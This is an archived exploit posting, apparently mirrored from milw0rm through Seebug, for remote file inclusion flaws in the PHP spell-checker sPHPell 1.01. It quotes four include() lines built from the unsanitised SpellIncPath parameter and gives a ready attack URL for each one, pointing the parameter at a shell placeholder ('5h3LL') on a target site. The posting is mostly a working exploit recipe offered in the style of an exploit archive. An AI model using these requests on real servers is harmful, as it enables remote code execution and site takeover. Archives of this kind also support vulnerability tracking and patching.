sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities

2007-06-30T00:00:00
ID SSV:17041
Type seebug
Reporter Root
Modified 2007-06-30T00:00:00

Description

No description provided by source.

                                        
                                            
                                                sphpell - 1.01 Remote File Include
---------------------------------------------------------------------------------
Bulan: Cyber-security // Cyber-security.org
---------------------------------------------------------------------------------
script download:http://sourceforge.net/project/showfiles.php?group_id=82330

---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?

              include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?

                   include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellchecktext.php? SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?

                        include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?

                     include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL

---------------------------------------------------------------------------------
d0rk: :(

# milw0rm.com [2007-06-30]